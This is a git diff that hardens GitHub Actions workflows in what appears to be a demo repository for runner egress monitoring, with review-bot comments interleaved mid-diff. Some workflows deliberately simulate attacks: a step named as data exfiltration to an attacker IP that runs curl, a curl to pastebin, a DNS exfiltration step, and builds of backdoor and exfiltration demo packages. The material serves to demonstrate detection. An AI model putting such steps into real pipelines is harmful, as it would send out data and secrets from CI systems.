diff --git a/.github/workflows/PRTargetWorkflow.yml b/.github/workflows/PRTargetWorkflow.yml
index 8bf0debd..dc670997 100644
--- a/.github/workflows/PRTargetWorkflow.yml
+++ b/.github/workflows/PRTargetWorkflow.yml
@@ -7,13 +7,22 @@ on:
- synchronize
- reopened
+permissions: {}
+
jobs:
pr-target-check:
+ permissions:
+ contents: read # for actions/checkout to fetch code
runs-on: ubuntu-latest
steps:
+ - name: Harden the runner (Audit all outbound calls)
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
+ with:
+ egress-policy: audit
+
- name: Check out code
- uses: actions/checkout@v4
+ uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
- name: Wait for 2 minutes
run: sleep 120
diff --git a/.github/workflows/anomalous-outbound-calls.yaml b/.github/workflows/anomalous-outbound-calls.yaml
index 2e87a976..1d42876f 100644
--- a/.github/workflows/anomalous-outbound-calls.yaml
+++ b/.github/workflows/anomalous-outbound-calls.yaml
@@ -1,13 +1,17 @@
name: Anomalous Outbound Calls
on:
workflow_dispatch:
+permissions: {}
+
jobs:
unexpected-outbound-calls:
+ permissions:
+ contents: read
name: AnomalousOutboundCalls
runs-on: ubuntu-latest
steps:
- name: Harden Runner
- uses: step-security/harden-runner@v2
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
with:
egress-policy: audit
- run: "curl https://pastebin.com -L || true"
diff --git a/.github/workflows/arc-codecov-simulation.yml b/.github/workflows/arc-codecov-simulation.yml
index dd1ab7dc..326f0353 100644
--- a/.github/workflows/arc-codecov-simulation.yml
+++ b/.github/workflows/arc-codecov-simulation.yml
@@ -7,7 +7,7 @@ jobs:
runs-on: self-hosted
steps:
- name: Harden Runner
- uses: step-security/harden-runner@v2
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
with:
egress-policy: block
allowed-endpoints:
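Review bot: `contents: read` is granted to the `unexpected-outbound-calls` job in anomalous-outbound-calls.yaml, although the only steps visible in the hunk are the harden-runner step and a `run: curl …` step, neither of which needs the repository token. With `permissions: {}` now set at the workflow level, a job without its own `permissions:` block should inherit the empty set, so dropping the two added job-level lines (or writing `permissions: {}` there) keeps the token at zero scope; unexpected-outbound-calls.yml makes the same grant. If the grant is deliberate, annotate it the way the other files in this commit do (`contents: read # for <step> to <reason>`), naming the step that needs it.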
>
@@ -19,8 +19,8 @@ jobs:
nodejs.org:443
production.cloudflare.docker.com:443
registry.npmjs.org:443
- - uses: actions/checkout@v3
- - uses: actions/setup-node@v3
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
+ - uses: actions/setup-node@3235b876344d2a9aa001b8d1453c930bba69e610 # v3.9.1
with:
node-version: 18
- name: npm install
@@ -28,7 +28,7 @@ jobs:
cd ./src/exfiltration-demo
npm install
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/arc-secure-by-default.yml b/.github/workflows/arc-secure-by-default.yml
index 96a7098d..eb98db3a 100644
--- a/.github/workflows/arc-secure-by-default.yml
+++ b/.github/workflows/arc-secure-by-default.yml
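Review bot: The comment on the `elgohr/Publish-Docker-Github-Action` pin in the `@@ -28,7` hunk records only the major tag, `# v5`, so it does not say which release `eb53b3ec…` was resolved from; `madhead/semver-utils@36d1e0ed… # latest` in hosted-file-monitor-with-hr.yml, hosted-file-monitor-without-hr.yml and hosted-network-filtering-hr.yml has the same problem. `v5` and `latest` are moving refs, so a reader cannot later check that the SHA still matches the intended release, and tools that refresh SHA pins generally key off that trailing comment. Write the exact release the SHA corresponds to, e.g. `uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # <exact release tag>`, in every occurrence (the same `# v5` annotation appears in arc-solarwinds-simulation.yml, arc-zero-effort-observability.yml, baseline_checks.yml, hosted-network-monitoring-hr.yml, hosted-network-without-hr.yml, publish.yml, self-hosted-file-monitor-with-hr.yml, self-hosted-network-filtering-hr.yml and self-hosted-network-monitoring-hr.yml).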
@@ -2,19 +2,35 @@ name: "ARC: Secure-By-Default Cluster-Level Policy"
on:
workflow_dispatch:
+permissions: {}
+
jobs:
direct-ip-hosted:
+ permissions:
+ contents: read # for actions/checkout to fetch code
runs-on: ubuntu-latest
steps:
- - uses: actions/checkout@v3
+ - name: Harden the runner (Audit all outbound calls)
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
+ with:
+ egress-policy: audit
+
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
# Codecov Scenario: Exfiltrate data to attacker's IP address
- name: Data Exfiltration To Attacker Controlled IP address
run: curl 104.16.209.12 --connect-timeout 5
direct-ip-arc:
+ permissions:
+ contents: read # for actions/checkout to fetch code
runs-on: self-hosted
steps:
- - uses: actions/checkout@v3
+ - name: Harden the runner (Audit all outbound calls)
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
+ with:
+ egress-policy: audit
+
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
# Codecov Scenario: Exfiltrate data to attacker's IP address
- name: Data Exfiltration To Attacker Controlled IP address
diff --git a/.github/workflows/arc-solarwinds-simulation.yml b/.github/workflows/arc-solarwinds-simulation.yml
index 72ce7c17..5aee59af 100644
--- a/.github/workflows/arc-solarwinds-simulation.yml
+++ b/.github/workflows/arc-solarwinds-simulation.yml
@@ -6,8 +6,13 @@ jobs:
arc-solarwinds-simulation:
runs-on: self-hosted
steps:
- - uses: actions/checkout@v3
- - uses: actions/setup-node@v3
+ - name: Harden the runner (Audit all outbound calls)
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
+ with:
+ egress-policy: audit
+
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
+ - uses: actions/setup-node@3235b876344d2a9aa001b8d1453c930bba69e610 # v3.9.1
with:
node-version: 18
- name: npm install
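Review bot: Adding a per-job harden-runner step to `direct-ip-hosted` and `direct-ip-arc` appears to work against what this workflow's `name:` says it demonstrates, a cluster-level policy rather than a step in each job; the same insertion is made in arc-zero-effort-observability.yml, changed-files-vulnerability-without-hr.yml, hosted-file-monitor-without-hr.yml and hosted-network-without-hr.yml, whose names also suggest they are the baseline without a per-job step. If those files exist as the "without" half of a comparison, the comparison no longer holds after this commit. Either leave the step out of these files, or keep it and say why in a comment above the step, e.g. `# per-job harden-runner added only for audit telemetry; the control under test is unchanged`, and update the workflow `name:` where it no longer describes the job. The second job's run step lies outside the hunk.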
@@ -15,7 +20,7 @@ jobs:
cd ./src/backdoor-demo
npm install
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/arc-zero-effort-observability.yml b/.github/workflows/arc-zero-effort-observability.yml
index 5cb8daac..852f6a0c 100644
--- a/.github/workflows/arc-zero-effort-observability.yml
+++ b/.github/workflows/arc-zero-effort-observability.yml
@@ -6,8 +6,13 @@ jobs:
build:
runs-on: self-hosted
steps:
- - uses: actions/checkout@v3
- - uses: actions/setup-node@v3
+ - name: Harden the runner (Audit all outbound calls)
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
+ with:
+ egress-policy: audit
+
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
+ - uses: actions/setup-node@3235b876344d2a9aa001b8d1453c930bba69e610 # v3.9.1
with:
node-version: 18
- name: npm install
@@ -15,7 +20,7 @@ jobs:
cd ./src/exfiltration-demo
npm install
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/baseline_checks.yml b/.github/workflows/baseline_checks.yml
index 06fc0bc7..73b89298 100644
--- a/.github/workflows/baseline_checks.yml
+++ b/.github/workflows/baseline_checks.yml
@@ -7,13 +7,13 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- - uses: step-security/harden-runner@int-sh
+ - uses: step-security/harden-runner@668ad3cce4bd0191ec8fdd9868adcb7521a9dacd # int-sh
with:
egress-policy: audit
- - uses: crazy-max/ghaction-github-status@v4
+ - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0
- - uses: actions/checkout@v3
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
- name: npm install
run: |
@@ -22,12 +22,12 @@ jobs:
- name: get-npm-version
id: package-version
- uses: martinbeentjes/npm-get-version-action@v1.3.1
+ uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1
with:
path: src/exfiltration-demo
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/block-dns-exfiltration.yaml b/.github/workflows/block-dns-exfiltration.yaml
index 767d5d98..a110fb0e 100644
--- a/.github/workflows/block-dns-exfiltration.yaml
+++ b/.github/workflows/block-dns-exfiltration.yaml
@@ -1,20 +1,24 @@
name: Block DNS Exfiltration With Harden-Runner
on:
workflow_dispatch:
+permissions: {}
+
jobs:
build:
+ permissions:
+ contents: read # for actions/checkout to fetch code
name: Deploy
runs-on: ubuntu-latest
steps:
- name: Harden Runner
- uses: step-security/harden-runner@v2
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
with:
egress-policy: block
allowed-endpoints: |
github.com:443
- name: Code Checkout
- uses: actions/checkout@v4
+ uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
# DNS Data Exfiltration
- name: DNS Data Exfiltration
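Review bot: The harden-runner pin in the `build` job of baseline_checks.yml is resolved to a commit annotated `# int-sh`, which reads as a branch name rather than a release, while every other workflow in this commit pins the same action to `0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0`. If this workflow intentionally tracks an integration branch of the hardening agent, say so next to the pin, e.g. `# int-sh branch (<reason placeholder>), deliberately not a release`, so that a later cleanup neither silently "fixes" it to the release pin nor leaves it stale without anyone noticing. Otherwise pin it to the same v2.12.0 commit as the rest of the repository.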
diff --git a/.github/workflows/changed-files-vulnerability-with-hr.yml b/.github/workflows/changed-files-vulnerability-with-hr.yml
index d8ed7379..d8815fe3 100644
--- a/.github/workflows/changed-files-vulnerability-with-hr.yml
+++ b/.github/workflows/changed-files-vulnerability-with-hr.yml
@@ -15,21 +15,21 @@ jobs:
name: Test changed-files
steps:
- name: Harden Runner
- uses: step-security/harden-runner@v2
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
with:
disable-sudo: true
egress-policy: block
allowed-endpoints: >
github.com:443
- - uses: actions/checkout@v4
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
with:
fetch-depth: 0
# Example 1
- name: Get changed files
id: changed-files
- uses: tj-actions/changed-files@v40
+ uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5
- name: List all changed files
run: |
diff --git a/.github/workflows/changed-files-vulnerability-without-hr.yml b/.github/workflows/changed-files-vulnerability-without-hr.yml
index 4b74464f..b3c52b8a 100644
--- a/.github/workflows/changed-files-vulnerability-without-hr.yml
+++ b/.github/workflows/changed-files-vulnerability-without-hr.yml
@@ -14,14 +14,19 @@ jobs:
runs-on: ubuntu-latest
name: Test changed-files
steps:
- - uses: actions/checkout@v4
+ - name: Harden the runner (Audit all outbound calls)
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
+ with:
+ egress-policy: audit
+
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
with:
fetch-depth: 0
# Example 1
- name: Get changed files
id: changed-files
- uses: tj-actions/changed-files@v40
+ uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5
- name: List all changed files
run: |
diff --git a/.github/workflows/hosted-file-monitor-with-hr.yml b/.github/workflows/hosted-file-monitor-with-hr.yml
index eeb3b63f..5286ca90 100644
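Review bot: The `Get changed files` step in changed-files-vulnerability-with-hr.yml now calls `step-security/changed-files@95b56da… # v46.0.5`, a different action and a different major version than the `tj-actions/changed-files@v40` it replaces, in a file whose name says it demonstrates the changed-files vulnerability; the same swap is made in changed-files-vulnerability-without-hr.yml and tj-actions-changed-files-incident.yaml. If these workflows exist to reproduce the incident, the swap changes what they test, and the `# Example 1` step no longer exercises the upstream action at all. Either keep the original action pinned to the commit the demo was written against, or make the file's purpose match its content by updating the workflow `name:` and adding a comment above the step such as `# switched to the step-security fork after the tj-actions incident; this job no longer reproduces it`. The job definition starts above the hunk and its `run: |` script continues below it.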
--- a/.github/workflows/hosted-file-monitor-with-hr.yml
+++ b/.github/workflows/hosted-file-monitor-with-hr.yml
@@ -6,24 +6,24 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- - uses: step-security/harden-runner@v2
+ - uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
with:
egress-policy: audit
- - uses: actions/checkout@v3
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
- name: npm install
run: |
cd ./src/backdoor-demo
npm install
- - uses: madhead/semver-utils@latest
+ - uses: madhead/semver-utils@36d1e0ed361bd7b4b77665de8093092eaeabe6ba # latest
id: version
with:
version: 1.2.3
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/hosted-file-monitor-without-hr.yml b/.github/workflows/hosted-file-monitor-without-hr.yml
index a673fca8..b7abbe90 100644
--- a/.github/workflows/hosted-file-monitor-without-hr.yml
+++ b/.github/workflows/hosted-file-monitor-without-hr.yml
@@ -6,20 +6,25 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- - uses: actions/checkout@v3
+ - name: Harden the runner (Audit all outbound calls)
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
+ with:
+ egress-policy: audit
+
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
- name: npm install
run: |
cd ./src/backdoor-demo
npm install
- - uses: madhead/semver-utils@latest
+ - uses: madhead/semver-utils@36d1e0ed361bd7b4b77665de8093092eaeabe6ba # latest
id: version
with:
version: 1.2.3
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/hosted-https-monitoring-hr.yml b/.github/workflows/hosted-https-monitoring-hr.yml
index 37988487..e43ef3d1 100644
--- a/.github/workflows/hosted-https-monitoring-hr.yml
+++ b/.github/workflows/hosted-https-monitoring-hr.yml
@@ -2,17 +2,22 @@ name: "Hosted: HTTPS Monitoring with Harden-Runner"
on:
workflow_dispatch:
+permissions: {}
+
jobs:
build:
+ permissions:
+ contents: read # for JasonEtco/create-an-issue to read template files
+ issues: write # for JasonEtco/create-an-issue to create new issues
runs-on: ubuntu-latest
steps:
- - uses: step-security/harden-runner@v2
+ - uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
with:
egress-policy: audit
- - uses: actions/checkout@v3
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
- - uses: JasonEtco/create-an-issue@v2
+ - uses: JasonEtco/create-an-issue@1b14a70e4d8dc185e5cc76d3bec9eab20257b2c5 # v2.9.2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
diff --git a/.github/workflows/hosted-network-filtering-hr.yml b/.github/workflows/hosted-network-filtering-hr.yml
index 7dd7dcbf..cfb92b2a 100644
--- a/.github/workflows/hosted-network-filtering-hr.yml
+++ b/.github/workflows/hosted-network-filtering-hr.yml
@@ -7,7 +7,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Harden Runner
- uses: step-security/harden-runner@v2
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
with:
disable-sudo: true
egress-policy: block
@@ -17,9 +17,9 @@ jobs:
registry.npmjs.org:443
www.githubstatus.com:443
- - uses: crazy-max/ghaction-github-status@v4
+ - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0
- - uses: actions/checkout@v3
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
- name: npm install
run: |
@@ -28,17 +28,17 @@ jobs:
- name: get-npm-version
id: package-version
- uses: martinbeentjes/npm-get-version-action@v1.3.1
+ uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1
with:
path: src/exfiltration-demo
- - uses: madhead/semver-utils@latest
+ - uses: madhead/semver-utils@36d1e0ed361bd7b4b77665de8093092eaeabe6ba # latest
id: version
with:
version: 1.2.3
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/hosted-network-monitoring-hr.yml b/.github/workflows/hosted-network-monitoring-hr.yml
index 0aa55477..9c195e17 100644
--- a/.github/workflows/hosted-network-monitoring-hr.yml
+++ b/.github/workflows/hosted-network-monitoring-hr.yml
@@ -10,9 +10,9 @@ jobs:
with:
egress-policy: audit
- - uses: crazy-max/ghaction-github-status@v4
+ - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0
- - uses: actions/checkout@v3
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
- name: npm install
run: |
@@ -21,12 +21,12 @@ jobs:
- name: get-npm-version
id: package-version
- uses: martinbeentjes/npm-get-version-action@v1.3.1
+ uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1
with:
path: src/exfiltration-demo
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/hosted-network-without-hr.yml b/.github/workflows/hosted-network-without-hr.yml
index 3533b8c7..7a9560d0 100644
--- a/.github/workflows/hosted-network-without-hr.yml
+++ b/.github/workflows/hosted-network-without-hr.yml
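Review bot: The `with:` / `egress-policy: audit` context at the top of the `@@ -10,9` hunk in hosted-network-monitoring-hr.yml belongs to a harden-runner step whose `uses:` line sits above the hunk and is not touched by this commit, so it is not visible whether that step still references a floating `@v2` the way the other files did before this change. If it does, this is the one workflow left where the agent that audits the other pins is itself unpinned. Resolve it to the same `uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0` used everywhere else in the commit. The step starts before the hunk.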
@@ -6,9 +6,14 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- - uses: crazy-max/ghaction-github-status@v4
+ - name: Harden the runner (Audit all outbound calls)
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
+ with:
+ egress-policy: audit
+
+ - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0
- - uses: actions/checkout@v3
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
- name: npm install
run: |
@@ -17,12 +22,12 @@ jobs:
- name: get-npm-version
id: package-version
- uses: martinbeentjes/npm-get-version-action@v1.3.1
+ uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1
with:
path: src/exfiltration-demo
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml
index f4285263..acec0849 100644
--- a/.github/workflows/publish.yml
+++ b/.github/workflows/publish.yml
@@ -6,16 +6,16 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- - uses: step-security/harden-runner@v2
+ - uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
with:
egress-policy: audit
- - uses: actions/checkout@v3
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
- name: npm install
run: |
cd ./src/exfiltration-demo
npm install
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/secret-in-build-log.yml b/.github/workflows/secret-in-build-log.yml
index 847c1ca1..cb30c19a 100644
--- a/.github/workflows/secret-in-build-log.yml
+++ b/.github/workflows/secret-in-build-log.yml
@@ -3,15 +3,19 @@ name: Secret in Build Log
on:
workflow_dispatch:
+permissions: {}
+
jobs:
build:
+ permissions:
+ contents: read # for actions/checkout to fetch code
runs-on: ubuntu-latest
steps:
- - uses: actions/checkout@v3
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
- name: harden-runner
- uses: step-security/harden-runner@v2
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
with:
egress-policy: audit
diff --git a/.github/workflows/self-hosted-file-monitor-with-hr.yml b/.github/workflows/self-hosted-file-monitor-with-hr.yml
index a5360856..ce86eb64 100644
--- a/.github/workflows/self-hosted-file-monitor-with-hr.yml
+++ b/.github/workflows/self-hosted-file-monitor-with-hr.yml
@@ -6,8 +6,13 @@ jobs:
build:
runs-on: [self-hosted, ec2]
steps:
- - uses: actions/checkout@v3
- - uses: actions/setup-node@v3
+ - name: Harden the runner (Audit all outbound calls)
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
+ with:
+ egress-policy: audit
+
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
+ - uses: actions/setup-node@3235b876344d2a9aa001b8d1453c930bba69e610 # v3.9.1
with:
node-version: 18
- name: npm install
@@ -15,7 +20,7 @@ jobs:
cd ./src/backdoor-demo
npm install
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/self-hosted-network-filtering-hr.yml b/.github/workflows/self-hosted-network-filtering-hr.yml
index 815f293e..c25439b4 100644
--- a/.github/workflows/self-hosted-network-filtering-hr.yml
+++ b/.github/workflows/self-hosted-network-filtering-hr.yml
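Review bot: In secret-in-build-log.yml the harden-runner step is still the second step, after `actions/checkout`, so the checkout's outbound traffic happens before the agent starts and is not covered by the audit; every other workflow touched by this commit places harden-runner first, and this hunk pins both steps without fixing the order. Move `- name: harden-runner` / `uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0` / `with: egress-policy: audit` above the checkout step so that the whole job is observed. The `build` job's remaining steps lie below the hunk.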
@@ -7,7 +7,7 @@ jobs:
runs-on: [self-hosted, ec2]
steps:
- name: Harden Runner
- uses: step-security/harden-runner@v2
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
with:
egress-policy: block
allowed-endpoints: >
@@ -15,8 +15,8 @@ jobs:
ghcr.io:443
github.com:443
registry.npmjs.org:443
- - uses: actions/checkout@v3
- - uses: actions/setup-node@v3
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
+ - uses: actions/setup-node@3235b876344d2a9aa001b8d1453c930bba69e610 # v3.9.1
with:
node-version: 18
- name: npm install
@@ -24,7 +24,7 @@ jobs:
cd ./src/exfiltration-demo
npm install
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/self-hosted-network-monitoring-hr.yml b/.github/workflows/self-hosted-network-monitoring-hr.yml
index 5f0ba232..a0482503 100644
--- a/.github/workflows/self-hosted-network-monitoring-hr.yml
+++ b/.github/workflows/self-hosted-network-monitoring-hr.yml
@@ -6,8 +6,13 @@ jobs:
build:
runs-on: [self-hosted, ec2]
steps:
- - uses: actions/checkout@v3
- - uses: actions/setup-node@v3
+ - name: Harden the runner (Audit all outbound calls)
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
+ with:
+ egress-policy: audit
+
+ - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
+ - uses: actions/setup-node@3235b876344d2a9aa001b8d1453c930bba69e610 # v3.9.1
with:
node-version: 18
- name: npm install
@@ -15,7 +20,7 @@ jobs:
cd ./src/exfiltration-demo
npm install
- name: Publish to Registry
- uses: elgohr/Publish-Docker-Github-Action@v5
+ uses: elgohr/Publish-Docker-Github-Action@eb53b3ec07136a6ebaed78d8135806da64f7c7e2 # v5
with:
name: ${{ github.repository }}/prod:latest
username: ${{ github.actor }}
diff --git a/.github/workflows/tj-actions-changed-files-incident.yaml b/.github/workflows/tj-actions-changed-files-incident.yaml
index 7426c56f..17b45c95 100644
--- a/.github/workflows/tj-actions-changed-files-incident.yaml
+++ b/.github/workflows/tj-actions-changed-files-incident.yaml
@@ -14,19 +14,19 @@ jobs:
name: Test changed-files
steps:
- name: Harden Runner
- uses: step-security/harden-runner@v2
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
with:
disable-sudo: true
egress-policy: audit
- - uses: actions/checkout@v4
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
with:
fetch-depth: 0
# Example 1
- name: Get changed files
id: changed-files
- uses: tj-actions/changed-files@v35
+ uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5
- name: List all changed files
run: |
diff --git a/.github/workflows/toc-tou.yml b/.github/workflows/toc-tou.yml
index 50ca25cb..a3501771 100644
--- a/.github/workflows/toc-tou.yml
+++ b/.github/workflows/toc-tou.yml
@@ -15,7 +15,12 @@ jobs:
contents: read
pull-requests: read
steps:
- - uses: actions/checkout@v4
+ - name: Harden the runner (Audit all outbound calls)
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
+ with:
+ egress-policy: audit
+
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
- name: Wait for demo purposes
run: |
@@ -40,7 +45,12 @@ jobs:
contents: read
pull-requests: read
steps:
- - uses: actions/checkout@v4
+ - name: Harden the runner (Audit all outbound calls)
+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
+ with:
+ egress-policy: audit
+
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
- name: Wait for demo purposes
run: |
@@ -48,7 +58,7 @@ jobs:
sleep 120
# SECURE: Gets exactly the code that was approved
- - uses: actions/checkout@v4
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
with:
ref: ${{ github.event.pull_request.head.sha }}
diff --git a/.github/workflows/unexpected-outbound-calls.yml b/.github/workflows/unexpected-outbound-calls.yml
index f5316797..83bba8d0 100644
--- a/.github/workflows/unexpected-outbound-calls.yml
+++ b/.github/workflows/unexpected-outbound-calls.yml
@@ -1,13 +1,17 @@
name: Unexpected Outbound Calls
on:
workflow_dispatch:
+permissions: {}
+
jobs:
unexpected-outbound-calls:
+ permissions:
+ contents: read
name: UnexpectedOutboundCalls
runs-on: ubuntu-latest
steps:
- name: Harden Runner
- uses: step-security/harden-runner@v2
